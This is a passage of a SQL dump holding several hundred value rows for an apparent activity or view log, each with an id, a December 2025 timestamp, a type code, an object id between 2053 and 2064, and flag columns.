(23559, '2025-12-20 00:15:46', 1, 2054, 0, 1, 1),
(23560, '2025-12-20 00:15:46', 1, 2058, 0, 1, 1),
(23561, '2025-12-20 00:15:47', 1, 2058, 0, 1, 1),
(23562, '2025-12-20 00:15:47', 1, 2058, 0, 1, 1),
(23563, '2025-12-20 00:15:47', 1, 2054, 0, 1, 1),
(23564, '2025-12-20 00:15:48', 1, 2060, 0, 1, 1),
(23565, '2025-12-20 00:15:49', 1, 2060, 0, 1, 1),
(23566, '2025-12-20 00:15:49', 1, 2058, 0, 1, 1),
(23567, '2025-12-20 00:15:50', 1, 2060, 0, 1, 1),
(23568, '2025-12-20 00:15:50', 1, 2060, 0, 1, 1),
(23569, '2025-12-20 00:15:50', 1, 2060, 0, 1, 1),
(23570, '2025-12-20 00:15:50', 1, 2060, 0, 1, 1),
(23571, '2025-12-20 00:15:51', 1, 2060, 0, 1, 1),
(23572, '2025-12-20 00:15:51', 1, 2060, 0, 1, 1),
(23573, '2025-12-20 00:15:52', 1, 2055, 0, 1, 1),
(23574, '2025-12-20 00:15:53', 1, 2058, 0, 1, 1),
(23575, '2025-12-20 00:15:54', 1, 2058, 0, 1, 1),
(23576, '2025-12-20 00:15:54', 1, 2058, 0, 1, 1),
(23577, '2025-12-20 00:15:56', 1, 2059, 0, 1, 1),
(23578, '2025-12-20 00:15:56', 1, 2058, 0, 1, 1),
(23579, '2025-12-20 00:15:56', 1, 2058, 0, 1, 1),
(23580, '2025-12-20 00:15:59', 1, 2053, 0, 1, 1),
(23581, '2025-12-20 00:15:59', 1, 2059, 0, 1, 1),
(23582, '2025-12-20 00:15:59', 1, 2053, 0, 1, 1),
(23583, '2025-12-20 00:15:59', 1, 2059, 0, 1, 1),
(23584, '2025-12-20 00:16:00', 1, 2058, 0, 1, 1),
(23585, '2025-12-20 00:16:00', 1, 2054, 0, 1, 1),
(23586, '2025-12-20 00:16:01', 1, 2058, 0, 1, 1),
(23587, '2025-12-20 00:16:01', 1, 2058, 0, 1, 1),
(23588, '2025-12-20 00:16:01', 1, 2054, 0, 1, 1),
(23589, '2025-12-20 00:16:01', 1, 2058, 0, 1, 1),
(23590, '2025-12-20 00:16:01', 1, 2055, 0, 1, 1),
(23591, '2025-12-20 00:16:01', 1, 2054, 0, 1, 1),
(23592, '2025-12-20 00:16:02', 1, 2054, 0, 1, 1),
(23593, '2025-12-20 00:16:02', 1, 2060, 0, 1, 1),
(23594, '2025-12-20 00:16:02', 1, 2054, 0, 1, 1),
(23595, '2025-12-20 00:16:02', 1, 2059, 0, 1, 1),
(23596, '2025-12-20 00:16:04', 1, 2055, 0, 1, 1),
(23597, '2025-12-20 00:16:04', 1, 2055, 0, 1, 1),
(23598, '2025-12-20 00:16:04', 1, 2058, 0, 1, 1),
(23599, '2025-12-20 00:16:04', 1, 2058, 0, 1, 1),
(23600, '2025-12-20 00:16:05', 1, 2059, 0, 1, 1),
(23601, '2025-12-20 00:16:05', 1, 2053, 0, 1, 1),
(23602, '2025-12-20 00:16:06', 1, 2059, 0, 1, 1),
(23603, '2025-12-20 00:16:06', 1, 2060, 0, 1, 1),
(23604, '2025-12-20 00:16:06', 1, 2058, 0, 1, 1),
(23605, '2025-12-20 00:16:07', 1, 2053, 0, 1, 1),
(23606, '2025-12-20 00:16:07', 1, 2059, 0, 1, 1),
(23607, '2025-12-20 00:16:07', 1, 2059, 0, 1, 1),
(23608, '2025-12-20 00:16:07', 1, 2054, 0, 1, 1),
(23609, '2025-12-20 00:16:07', 1, 2059, 0, 1, 1),
(23610, '2025-12-20 00:16:08', 1, 2055, 0, 1, 1),
(23611, '2025-12-20 00:16:08', 1, 2055, 0, 1, 1),
(23612, '2025-12-20 00:16:08', 1, 2055, 0, 1, 1),
(23613, '2025-12-20 00:16:08', 1, 2055, 0, 1, 1),
(23614, '2025-12-20 00:16:09', 1, 2055, 0, 1, 1),
(23615, '2025-12-20 00:16:09', 1, 2058, 0, 1, 1),
(23616, '2025-12-20 00:16:10', 1, 2058, 0, 1, 1),
(23617, '2025-12-20 00:16:10', 1, 2060, 0, 1, 1),
(23618, '2025-12-20 00:16:10', 1, 2060, 0, 1, 1),
(23619, '2025-12-20 00:16:11', 1, 2058, 0, 1, 1),
(23620, '2025-12-20 00:16:11', 1, 2060, 0, 1, 1),
(23621, '2025-12-20 00:16:11', 1, 2060, 0, 1, 1),
(23622, '2025-12-20 00:16:11', 1, 2060, 0, 1, 1),
(23623, '2025-12-20 00:16:11', 1, 2058, 0, 1, 1),
(23624, '2025-12-20 00:16:12', 1, 2060, 0, 1, 1),
(23625, '2025-12-20 00:16:12', 1, 2058, 0, 1, 1),
(23626, '2025-12-20 00:16:13', 1, 2055, 0, 1, 1),
(23627, '2025-12-20 00:16:13', 1, 2054, 0, 1, 1),
(23628, '2025-12-20 00:16:13', 1, 2055, 0, 1, 1),
(23629, '2025-12-20 00:16:14', 1, 2055, 0, 1, 1),
(23630, '2025-12-20 00:16:15', 1, 2058, 0, 1, 1),
(23631, '2025-12-20 00:16:16', 1, 2058, 0, 1, 1),
(23632, '2025-12-20 00:16:16', 1, 2058, 0, 1, 1),
(23633, '2025-12-20 00:16:16', 1, 2058, 0, 1, 1),
(23634, '2025-12-20 00:16:18', 1, 2058, 0, 1, 1),
(23635, '2025-12-20 00:16:19', 1, 2059, 0, 1, 1),
(23636, '2025-12-20 00:16:19', 1, 2053, 0, 1, 1),
(23637, '2025-12-20 00:16:19', 1, 2059, 0, 1, 1),
(23638, '2025-12-20 00:16:19', 1, 2053, 0, 1, 1),
(23639, '2025-12-20 00:16:20', 1, 2058, 0, 1, 1),
(23640, '2025-12-20 00:16:20', 1, 2058, 0, 1, 1),
(23641, '2025-12-20 00:16:21', 1, 2054, 0, 1, 1),
(23642, '2025-12-20 00:16:21', 1, 2054, 0, 1, 1),
(23643, '2025-12-20 00:16:21', 1, 2058, 0, 1, 1),
(23644, '2025-12-20 00:16:21', 1, 2054, 0, 1, 1),
(23645, '2025-12-20 00:16:22', 1, 2058, 0, 1, 1),
(23646, '2025-12-20 00:16:22', 1, 2058, 0, 1, 1),
(23647, '2025-12-20 00:16:22', 1, 2054, 0, 1, 1),
(23648, '2025-12-20 00:16:23', 1, 2054, 0, 1, 1),
(23649, '2025-12-20 00:16:23', 1, 2060, 0, 1, 1),
(23650, '2025-12-20 00:16:24', 1, 2058, 0, 1, 1),
(23651, '2025-12-20 00:16:25', 1, 2054, 0, 1, 1),
(23652, '2025-12-20 00:16:25', 1, 2059, 0, 1, 1),
(23653, '2025-12-20 00:16:25', 1, 2058, 0, 1, 1),
(23654, '2025-12-20 00:16:25', 1, 2055, 0, 1, 1),
(23655, '2025-12-20 00:16:26', 1, 2055, 0, 1, 1),
(23656, '2025-12-20 00:16:26', 1, 2058, 0, 1, 1),
(23657, '2025-12-20 00:16:26', 1, 2053, 0, 1, 1),
(23658, '2025-12-20 00:16:27', 1, 2053, 0, 1, 1),
(23659, '2025-12-20 00:16:27', 1, 2055, 0, 1, 1),
(23660, '2025-12-20 00:16:28', 1, 2055, 0, 1, 1),
(23661, '2025-12-20 00:16:28', 1, 2055, 0, 1, 1),
(23662, '2025-12-20 00:16:29', 1, 2059, 0, 1, 1),
(23663, '2025-12-20 00:16:29', 1, 2059, 0, 1, 1),
(23664, '2025-12-20 00:16:29', 1, 2053, 0, 1, 1),
(23665, '2025-12-20 00:16:30', 1, 2059, 0, 1, 1),
(23666, '2025-12-20 00:16:30', 1, 2058, 0, 1, 1),
(23667, '2025-12-20 00:16:30', 1, 2054, 0, 1, 1),
(23668, '2025-12-20 00:16:30', 1, 2055, 0, 1, 1),
(23669, '2025-12-20 00:16:30', 1, 2059, 0, 1, 1),
(23670, '2025-12-20 00:16:31', 1, 2054, 0, 1, 1),
(23671, '2025-12-20 00:16:31', 1, 2059, 0, 1, 1),
(23672, '2025-12-20 00:16:31', 1, 2059, 0, 1, 1),
(23673, '2025-12-20 00:16:32', 1, 2058, 0, 1, 1),
(23674, '2025-12-20 00:16:32', 1, 2059, 0, 1, 1),
(23675, '2025-12-20 00:16:32', 1, 2053, 0, 1, 1),
(23676, '2025-12-20 00:16:32', 1, 2060, 0, 1, 1),
(23677, '2025-12-20 00:16:33', 1, 2060, 0, 1, 1),
(23678, '2025-12-20 00:16:33', 1, 2060, 0, 1, 1),
(23679, '2025-12-20 00:16:33', 1, 2060, 0, 1, 1),
(23680, '2025-12-20 00:16:33', 1, 2054, 0, 1, 1),
(23681, '2025-12-20 00:16:33', 1, 2058, 0, 1, 1),
(23682, '2025-12-20 00:16:34', 1, 2060, 0, 1, 1),
(23683, '2025-12-20 00:16:34', 1, 2058, 0, 1, 1),
(23684, '2025-12-20 00:16:34', 1, 2060, 0, 1, 1),
(23685, '2025-12-20 00:16:34', 1, 2060, 0, 1, 1),
(23686, '2025-12-20 00:16:35', 1, 2054, 0, 1, 1),
(23687, '2025-12-20 00:16:35', 1, 2058, 0, 1, 1),
(23688, '2025-12-20 00:16:35', 1, 2054, 0, 1, 1),
(23689, '2025-12-20 00:16:36', 1, 2054, 0, 1, 1),
(23690, '2025-12-20 00:16:36', 1, 2058, 0, 1, 1),
(23691, '2025-12-20 00:16:39', 1, 2058, 0, 1, 1),
(23692, '2025-12-20 00:16:39', 1, 2058, 0, 1, 1),
(23693, '2025-12-20 00:16:42', 1, 2058, 0, 1, 1),
(23694, '2025-12-20 00:16:42', 1, 2058, 0, 1, 1),
(23695, '2025-12-20 00:16:44', 1, 2058, 0, 1, 1),
(23696, '2025-12-20 00:16:47', 1, 2058, 0, 1, 1),
(23697, '2025-12-20 00:16:48', 1, 2058, 0, 1, 1),
(23698, '2025-12-20 00:16:49', 1, 2054, 0, 1, 1),
(23699, '2025-12-20 00:16:49', 1, 2058, 0, 1, 1),
(23700, '2025-12-20 00:16:50', 1, 2058, 0, 1, 1),
(23701, '2025-12-20 00:16:50', 1, 2058, 0, 1, 1),
(23702, '2025-12-20 00:16:52', 1, 2058, 0, 1, 1),
(23703, '2025-12-20 00:16:54', 1, 2054, 0, 1, 1),
(23704, '2025-12-20 00:16:55', 1, 2059, 0, 1, 1),
(23705, '2025-12-20 00:16:55', 1, 2058, 0, 1, 1),
(23706, '2025-12-20 00:16:57', 1, 2058, 0, 1, 1),
(23707, '2025-12-20 00:16:58', 1, 2058, 0, 1, 1),
(23708, '2025-12-20 00:31:05', 1, 2054, 0, 1, 1),
(23709, '2025-12-20 00:42:15', 1, 2064, 0, 1, 1),
(23710, '2025-12-20 00:49:04', 1, 2054, 0, 1, 1),
(23711, '2025-12-20 04:09:56', 1, 2054, 0, 1, 1),
(23712, '2025-12-20 05:34:30', 1, 2064, 0, 1, 1),
(23713, '2025-12-20 06:04:23', 1, 2061, 0, 1, 1),
(23714, '2025-12-20 06:19:12', 1, 2054, 0, 1, 1),
(23715, '2025-12-20 07:31:53', 1, 2064, 0, 1, 1),
(23716, '2025-12-20 08:31:15', 1, 2064, 0, 1, 1),
(23717, '2025-12-20 08:36:44', 1, 2054, 0, 1, 1),
(23718, '2025-12-20 08:39:24', 1, 2063, 0, 1, 1),
(23719, '2025-12-20 08:46:47', 1, 2058, 0, 1, 1),
(23720, '2025-12-20 09:06:32', 1, 2064, 0, 1, 1),
(23721, '2025-12-20 09:30:14', 1, 2063, 0, 1, 1),
(23722, '2025-12-20 11:16:10', 1, 2064, 0, 1, 1),
(23723, '2025-12-20 11:19:18', 1, 2061, 0, 1, 1),
(23724, '2025-12-20 12:36:35', 1, 2060, 0, 1, 1),
(23725, '2025-12-20 12:36:40', 1, 2060, 0, 1, 1),
(23726, '2025-12-20 12:41:03', 1, 2060, 0, 1, 1),
(23727, '2025-12-20 13:36:46', 1, 2053, 0, 1, 1),
(23728, '2025-12-20 13:38:39', 1, 2060, 0, 1, 1),
(23729, '2025-12-20 13:38:42', 1, 2060, 0, 1, 1),
(23730, '2025-12-20 14:14:11', 1, 2054, 0, 1, 1),
(23731, '2025-12-20 14:36:48', 1, 2064, 0, 1, 1),
(23732, '2025-12-20 15:04:02', 1, 2060, 0, 1, 1),
(23733, '2025-12-20 15:21:47', 1, 2062, 0, 1, 1),
(23734, '2025-12-20 16:03:00', 1, 2062, 0, 1, 1),
(23735, '2025-12-20 16:59:22', 1, 2064, 0, 1, 1),
(23736, '2025-12-20 17:30:32', 1, 2054, 0, 1, 1),
(23737, '2025-12-20 17:32:29', 1, 2059, 0, 1, 1),
(23738, '2025-12-20 17:53:27', 1, 2061, 0, 1, 1),
(23739, '2025-12-20 18:12:25', 1, 2063, 0, 1, 1),
(23740, '2025-12-20 20:27:40', 1, 2054, 0, 1, 1),
(23741, '2025-12-20 22:02:25', 1, 2064, 0, 1, 1),
(23742, '2025-12-20 23:38:44', 1, 2054, 0, 1, 1),
(23743, '2025-12-21 00:37:50', 1, 2062, 0, 1, 1),
(23744, '2025-12-21 00:48:50', 1, 2061, 0, 1, 1),
(23745, '2025-12-21 00:58:26', 1, 2058, 0, 1, 1),
(23746, '2025-12-21 01:08:45', 1, 2055, 0, 1, 1),
(23747, '2025-12-21 01:17:27', 1, 2055, 0, 1, 1),
(23748, '2025-12-21 01:17:28', 1, 2058, 0, 1, 1),
(23749, '2025-12-21 01:17:55', 1, 2054, 0, 1, 1),
(23750, '2025-12-21 01:37:08', 1, 2064, 0, 1, 1),
(23751, '2025-12-21 03:51:21', 1, 2059, 0, 1, 1),
(23752, '2025-12-21 04:54:37', 1, 2054, 0, 1, 1),
(23753, '2025-12-21 05:01:35', 1, 2064, 0, 1, 1),
(23754, '2025-12-21 05:55:21', 1, 2060, 0, 1, 1),
(23755, '2025-12-21 06:30:51', 1, 2064, 0, 1, 1),
(23756, '2025-12-21 07:06:56', 1, 2060, 0, 1, 1),
(23757, '2025-12-21 07:31:01', 1, 2053, 0, 1, 1),
(23758, '2025-12-21 07:32:34', 1, 2063, 0, 1, 1),
(23759, '2025-12-21 07:33:20', 1, 2064, 0, 1, 1),
(23760, '2025-12-21 07:37:59', 1, 2055, 0, 1, 1),
(23761, '2025-12-21 07:38:20', 1, 2062, 0, 1, 1),
(23762, '2025-12-21 08:02:54', 1, 2055, 0, 1, 1),
(23763, '2025-12-21 08:57:18', 1, 2059, 0, 1, 1),
(23764, '2025-12-21 08:57:22', 1, 2060, 0, 1, 1),
(23765, '2025-12-21 11:46:02', 1, 2055, 0, 1, 1),
(23766, '2025-12-21 11:48:30', 1, 2060, 0, 1, 1),
(23767, '2025-12-21 11:54:55', 1, 2063, 0, 1, 1),
(23768, '2025-12-21 12:11:16', 1, 2058, 0, 1, 1),
(23769, '2025-12-21 12:19:35', 1, 2054, 0, 1, 1),
(23770, '2025-12-21 12:39:28', 1, 2055, 0, 1, 1),
(23771, '2025-12-21 13:28:36', 1, 2061, 0, 1, 1),
(23772, '2025-12-21 13:58:16', 1, 2062, 0, 1, 1),
(23773, '2025-12-21 14:11:09', 1, 2064, 0, 1, 1),
(23774, '2025-12-21 14:54:34', 1, 2054, 0, 1, 1),
(23775, '2025-12-21 15:06:20', 1, 2059, 0, 1, 1),
(23776, '2025-12-21 15:16:21', 1, 2064, 0, 1, 1),
(23777, '2025-12-21 17:08:56', 1, 2062, 0, 1, 1),
(23778, '2025-12-21 17:10:07', 1, 2060, 0, 1, 1),
(23779, '2025-12-21 18:12:19', 1, 2060, 0, 1, 1),
(23780, '2025-12-21 18:29:25', 1, 2062, 0, 1, 1),
(23781, '2025-12-21 18:30:48', 1, 2064, 0, 1, 1),
(23782, '2025-12-21 18:51:18', 1, 2061, 0, 1, 1),
(23783, '2025-12-21 18:54:03', 1, 2062, 0, 1, 1),
(23784, '2025-12-21 21:16:16', 1, 2064, 0, 1, 1),
(23785, '2025-12-21 21:34:29', 1, 2061, 0, 1, 1),
(23786, '2025-12-21 22:24:26', 1, 2064, 0, 1, 1),
(23787, '2025-12-21 22:32:18', 1, 2064, 0, 1, 1),
(23788, '2025-12-21 23:25:23', 1, 2054, 0, 1, 1),
(23789, '2025-12-22 01:02:21', 1, 2054, 0, 1, 1),
(23790, '2025-12-22 04:51:28', 1, 2053, 0, 1, 1),
(23791, '2025-12-22 07:04:48', 1, 2061, 0, 1, 1),
(23792, '2025-12-22 07:11:06', 1, 2059, 0, 1, 1),
(23793, '2025-12-22 07:11:26', 1, 2058, 0, 1, 1),
(23794, '2025-12-22 07:12:21', 1, 2063, 0, 1, 1),
(23795, '2025-12-22 07:13:00', 1, 2062, 0, 1, 1),
(23796, '2025-12-22 08:00:59', 1, 2054, 0, 1, 1),
(23797, '2025-12-22 10:00:11', 1, 2060, 0, 1, 1),
(23798, '2025-12-22 12:50:48', 1, 2064, 0, 1, 1),
(23799, '2025-12-22 12:59:30', 1, 2054, 0, 1, 1),
(23800, '2025-12-22 15:12:08', 1, 2060, 0, 1, 1),
(23801, '2025-12-22 16:21:35', 1, 2064, 0, 1, 1),
(23802, '2025-12-22 16:45:57', 1, 2062, 0, 1, 1),
(23803, '2025-12-22 16:48:54', 1, 2054, 0, 1, 1),
(23804, '2025-12-22 17:48:00', 1, 2062, 0, 1, 1),
(23805, '2025-12-22 18:02:47', 1, 2064, 0, 1, 1),
(23806, '2025-12-22 19:43:33', 1, 2054, 0, 1, 1),
(23807, '2025-12-22 19:43:34', 1, 2058, 0, 1, 1),
(23808, '2025-12-22 22:24:00', 1, 2064, 0, 1, 1),
(23809, '2025-12-22 23:33:33', 1, 2062, 0, 1, 1),
(23810, '2025-12-23 01:53:11', 1, 2053, 0, 1, 1),
(23811, '2025-12-23 03:33:45', 1, 2059, 0, 1, 1),
(23812, '2025-12-23 04:28:47', 1, 2054, 0, 1, 1),
(23813, '2025-12-23 05:01:29', 1, 2060, 0, 1, 1),
(23814, '2025-12-23 06:05:57', 1, 2060, 0, 1, 1),
(23815, '2025-12-23 07:32:49', 1, 2053, 0, 1, 1),
(23816, '2025-12-23 07:36:01', 1, 2063, 0, 1, 1),
(23817, '2025-12-23 07:36:07', 1, 2064, 0, 1, 1),
(23818, '2025-12-23 07:36:10', 1, 2055, 0, 1, 1),
(23819, '2025-12-23 07:36:48', 1, 2062, 0, 1, 1),
(23820, '2025-12-23 08:22:54', 1, 2064, 0, 1, 1),
(23821, '2025-12-23 08:27:37', 1, 2054, 0, 1, 1),
(23822, '2025-12-23 11:24:51', 1, 2054, 0, 1, 1),
(23823, '2025-12-23 12:05:07', 1, 2053, 0, 1, 1),
(23824, '2025-12-23 12:44:05', 1, 2058, 0, 1, 1),
(23825, '2025-12-23 13:48:39', 1, 2060, 0, 1, 1),
(23826, '2025-12-23 14:13:23', 1, 2064, 0, 1, 1),
(23827, '2025-12-23 15:17:17', 1, 2060, 0, 1, 1),
(23828, '2025-12-23 15:59:35', 1, 2055, 0, 1, 1),
(23829, '2025-12-23 16:05:50', 1, 2064, 0, 1, 1),
(23830, '2025-12-23 16:41:13', 1, 2062, 0, 1, 1),
(23831, '2025-12-23 18:13:24', 1, 2062, 0, 1, 1),
(23832, '2025-12-23 18:53:57', 1, 2059, 0, 1, 1),
(23833, '2025-12-23 19:29:38', 1, 2060, 0, 1, 1),
(23834, '2025-12-23 19:41:12', 1, 2058, 0, 1, 1),
(23835, '2025-12-23 19:41:27', 1, 2055, 0, 1, 1),
(23836, '2025-12-23 19:41:58', 1, 2062, 0, 1, 1),
(23837, '2025-12-23 19:45:56', 1, 2060, 0, 1, 1),
(23838, '2025-12-23 19:52:12', 1, 2063, 0, 1, 1),
(23839, '2025-12-23 19:53:41', 1, 2059, 0, 1, 1),
(23840, '2025-12-23 19:57:51', 1, 2064, 0, 1, 1),
(23841, '2025-12-23 19:58:57', 1, 2054, 0, 1, 1),
(23842, '2025-12-23 20:22:23', 1, 2061, 0, 1, 1),
(23843, '2025-12-23 22:54:54', 1, 2053, 0, 1, 1),
(23844, '2025-12-23 23:12:34', 1, 2054, 0, 1, 1),
(23845, '2025-12-23 23:44:29', 1, 2054, 0, 1, 1),
(23846, '2025-12-24 02:27:21', 1, 2064, 0, 1, 1),
(23847, '2025-12-24 04:15:36', 1, 2064, 0, 1, 1),
(23848, '2025-12-24 04:37:51', 1, 2060, 0, 1, 1),
(23849, '2025-12-24 04:37:54', 1, 2060, 0, 1, 1),
(23850, '2025-12-24 05:45:40', 1, 2060, 0, 1, 1),
(23851, '2025-12-24 05:45:43', 1, 2060, 0, 1, 1),
(23852, '2025-12-24 06:37:38', 1, 2060, 0, 1, 1),
(23853, '2025-12-24 07:03:35', 1, 2064, 0, 1, 1),
(23854, '2025-12-24 11:35:12', 1, 2060, 0, 1, 1),
(23855, '2025-12-24 11:40:16', 1, 2062, 0, 1, 1),
(23856, '2025-12-24 11:41:28', 1, 2060, 0, 1, 1),
(23857, '2025-12-24 12:04:36', 1, 2064, 0, 1, 1),
(23858, '2025-12-24 12:14:55', 1, 2055, 0, 1, 1),
(23859, '2025-12-24 12:43:58', 1, 2054, 0, 1, 1),
(23860, '2025-12-24 13:04:47', 1, 2054, 0, 1, 1),
(23861, '2025-12-24 13:21:01', 1, 2053, 0, 1, 1),
(23862, '2025-12-24 13:46:39', 1, 2058, 0, 1, 1),
(23863, '2025-12-24 15:05:51', 1, 2059, 0, 1, 1),
(23864, '2025-12-24 15:19:28', 1, 2062, 0, 1, 1),
(23865, '2025-12-24 15:21:02', 1, 2064, 0, 1, 1),
(23866, '2025-12-24 15:24:19', 1, 2054, 0, 1, 1),
(23867, '2025-12-24 15:27:42', 1, 2062, 0, 1, 1),
(23868, '2025-12-24 15:31:48', 1, 2059, 0, 1, 1),
(23869, '2025-12-24 15:32:11', 1, 2061, 0, 1, 1),
(23870, '2025-12-24 15:32:17', 1, 2062, 0, 1, 1),
(23871, '2025-12-24 15:33:16', 1, 2058, 0, 1, 1),
(23872, '2025-12-24 15:36:47', 1, 2063, 0, 1, 1),
(23873, '2025-12-24 15:36:49', 1, 2062, 0, 1, 1),
(23874, '2025-12-24 15:53:46', 1, 2061, 0, 1, 1),
(23875, '2025-12-24 15:59:48', 1, 2063, 0, 1, 1),
(23876, '2025-12-24 16:19:11', 1, 2064, 0, 1, 1),
(23877, '2025-12-24 16:20:47', 1, 2062, 0, 1, 1),
(23878, '2025-12-24 17:19:36', 1, 2064, 0, 1, 1),
(23879, '2025-12-24 17:24:44', 1, 2062, 0, 1, 1),
(23880, '2025-12-24 17:26:06', 1, 2064, 0, 1, 1),
(23881, '2025-12-24 17:36:26', 1, 2059, 0, 1, 1),
(23882, '2025-12-24 20:04:52', 1, 2060, 0, 1, 1),
(23883, '2025-12-24 20:11:55', 1, 2061, 0, 1, 1),
(23884, '2025-12-24 22:23:29', 1, 2060, 0, 1, 1),
(23885, '2025-12-24 23:14:28', 1, 2060, 0, 1, 1),
(23886, '2025-12-24 23:33:39', 1, 2060, 0, 1, 1),
(23887, '2025-12-25 00:29:10', 1, 2064, 0, 1, 1),
(23888, '2025-12-25 02:41:54', 1, 2054, 0, 1, 1),
(23889, '2025-12-25 02:50:36', 1, 2054, 0, 1, 1),
(23890, '2025-12-25 04:30:35', 1, 2064, 0, 1, 1),
(23891, '2025-12-25 07:33:11', 1, 2053, 0, 1, 1),
(23892, '2025-12-25 07:33:27', 1, 2063, 0, 1, 1),
(23893, '2025-12-25 07:42:23', 1, 2064, 0, 1, 1),
(23894, '2025-12-25 07:42:59', 1, 2055, 0, 1, 1),
(23895, '2025-12-25 07:43:29', 1, 2062, 0, 1, 1),
(23896, '2025-12-25 09:36:01', 1, 2059, 0, 1, 1),
(23897, '2025-12-25 10:14:31', 1, 2054, 0, 1, 1),
(23898, '2025-12-25 11:28:01', 1, 2054, 0, 1, 1),
(23899, '2025-12-25 12:52:45', 1, 2064, 0, 1, 1),
(23900, '2025-12-25 14:41:27', 1, 2054, 0, 1, 1),
(23901, '2025-12-25 15:25:11', 1, 2064, 0, 1, 1),
(23902, '2025-12-25 15:56:22', 1, 2064, 0, 1, 1),
(23903, '2025-12-25 17:18:27', 1, 2058, 0, 1, 1),
(23904, '2025-12-25 18:14:08', 1, 2059, 0, 1, 1),
(23905, '2025-12-25 18:15:40', 1, 2062, 0, 1, 1),
(23906, '2025-12-25 19:34:29', 1, 2060, 0, 1, 1),
(23907, '2025-12-25 20:47:31', 1, 2062, 0, 1, 1),
(23908, '2025-12-25 21:45:35', 1, 2063, 0, 1, 1),
(23909, '2025-12-25 22:43:30', 1, 2061, 0, 1, 1),
(23910, '2025-12-25 22:43:30', 1, 2062, 0, 1, 1),
(23911, '2025-12-25 22:43:38', 1, 2063, 0, 1, 1),
(23912, '2025-12-25 23:17:29', 1, 2062, 0, 1, 1),
(23913, '2025-12-26 03:14:10', 1, 2054, 0, 1, 1),
(23914, '2025-12-26 03:47:07', 1, 2064, 0, 1, 1),
(23915, '2025-12-26 05:25:30', 1, 2064, 0, 1, 1),
(23916, '2025-12-26 05:49:56', 1, 2060, 0, 1, 1),
(23917, '2025-12-26 07:19:26', 1, 2061, 0, 1, 1),
(23918, '2025-12-26 08:03:53', 1, 2064, 0, 1, 1),
(23919, '2025-12-26 10:05:06', 1, 2060, 0, 1, 1),
(23920, '2025-12-26 13:52:21', 1, 2055, 0, 1, 1),
(23921, '2025-12-26 15:07:38', 1, 2054, 0, 1, 1),
(23922, '2025-12-26 15:56:50', 1, 2054, 0, 1, 1),
(23923, '2025-12-26 16:41:41', 1, 2062, 0, 1, 1),
(23924, '2025-12-26 16:42:54', 1, 2062, 0, 1, 1),
(23925, '2025-12-26 17:14:16', 1, 2064, 0, 1, 1),
(23926, '2025-12-26 17:17:30', 1, 2059, 0, 1, 1),
(23927, '2025-12-26 17:19:00', 1, 2062, 0, 1, 1),
(23928, '2025-12-26 17:19:01', 1, 2063, 0, 1, 1),
(23929, '2025-12-26 17:20:02', 1, 2061, 0, 1, 1),
(23930, '2025-12-26 17:22:08', 1, 2058, 0, 1, 1),
(23931, '2025-12-26 17:22:58', 1, 2060, 0, 1, 1),
(23932, '2025-12-26 17:22:59', 1, 2054, 0, 1, 1),
(23933, '2025-12-26 17:24:51', 1, 2064, 0, 1, 1),
(23934, '2025-12-26 18:17:17', 1, 2058, 0, 1, 1),
(23935, '2025-12-26 18:18:44', 1, 2064, 0, 1, 1),
(23936, '2025-12-26 18:35:17', 1, 2064, 0, 1, 1),
(23937, '2025-12-26 18:39:01', 1, 2059, 0, 1, 1),
(23938, '2025-12-26 18:43:20', 1, 2058, 0, 1, 1),
(23939, '2025-12-26 18:43:27', 1, 2061, 0, 1, 1),
(23940, '2025-12-26 19:08:58', 1, 2063, 0, 1, 1),
(23941, '2025-12-26 20:56:31', 1, 2053, 0, 1, 1),
(23942, '2025-12-26 21:40:37', 1, 2062, 0, 1, 1),
(23943, '2025-12-26 21:52:34', 1, 2054, 0, 1, 1),
(23944, '2025-12-26 22:20:28', 4, 2061, 5634, 1, 1),
(23945, '2025-12-26 22:31:29', 1, 2061, 0, 1, 1),
(23946, '2025-12-26 22:47:10', 1, 2054, 0, 1, 1),
(23947, '2025-12-26 22:52:59', 1, 2062, 0, 1, 1),
(23948, '2025-12-26 22:53:23', 1, 2059, 0, 1, 1),
(23949, '2025-12-26 22:53:58', 1, 2063, 0, 1, 1),
(23950, '2025-12-26 22:54:30', 1, 2061, 0, 1, 1),
(23951, '2025-12-26 23:28:43', 1, 2059, 0, 1, 1),
(23952, '2025-12-27 02:27:42', 1, 2060, 0, 1, 1),
(23953, '2025-12-27 02:45:51', 1, 2054, 0, 1, 1),
(23954, '2025-12-27 03:58:33', 1, 2063, 0, 1, 1),
(23955, '2025-12-27 04:18:46', 1, 2064, 0, 1, 1),
(23956, '2025-12-27 04:29:25', 1, 2053, 0, 1, 1),
(23957, '2025-12-27 04:44:43', 1, 2064, 0, 1, 1),
(23958, '2025-12-27 07:18:04', 1, 2064, 0, 1, 1),
(23959, '2025-12-27 07:37:07', 1, 2060, 0, 1, 1),
(23960, '2025-12-27 07:44:09', 1, 2063, 0, 1, 1),
(23961, '2025-12-27 07:57:39', 1, 2054, 0, 1, 1),
(23962, '2025-12-27 08:35:10', 1, 2058, 0, 1, 1),
(23963, '2025-12-27 08:53:25', 1, 2064, 0, 1, 1),
(23964, '2025-12-27 08:53:28', 1, 2063, 0, 1, 1),
(23965, '2025-12-27 08:53:30', 1, 2062, 0, 1, 1),
(23966, '2025-12-27 08:53:33', 1, 2061, 0, 1, 1),
(23967, '2025-12-27 08:53:35', 1, 2060, 0, 1, 1),
(23968, '2025-12-27 08:53:38', 1, 2059, 0, 1, 1),
(23969, '2025-12-27 08:53:40', 1, 2058, 0, 1, 1),
(23970, '2025-12-27 08:53:42', 1, 2055, 0, 1, 1),
(23971, '2025-12-27 08:53:44', 1, 2054, 0, 1, 1),
(23972, '2025-12-27 10:13:59', 1, 2064, 0, 1, 1),
(23973, '2025-12-27 11:06:48', 1, 2053, 0, 1, 1),
(23974, '2025-12-27 11:12:28', 1, 2064, 0, 1, 1),
(23975, '2025-12-27 11:16:01', 1, 2055, 0, 1, 1),
(23976, '2025-12-27 11:17:49', 1, 2062, 0, 1, 1),
(23977, '2025-12-27 12:25:32', 1, 2054, 0, 1, 1),
(23978, '2025-12-27 16:53:58', 1, 2054, 0, 1, 1),
(23979, '2025-12-27 17:10:02', 1, 2064, 0, 1, 1),
(23980, '2025-12-27 19:01:24', 1, 2062, 0, 1, 1),
(23981, '2025-12-27 19:02:47', 1, 2064, 0, 1, 1),
(23982, '2025-12-27 19:09:27', 1, 2061, 0, 1, 1),
(23983, '2025-12-27 19:29:22', 1, 2060, 0, 1, 1),
(23984, '2025-12-27 19:31:09', 1, 2064, 0, 1, 1),
(23985, '2025-12-27 20:06:50', 1, 2063, 0, 1, 1),
(23986, '2025-12-27 20:41:21', 1, 2061, 0, 1, 1),
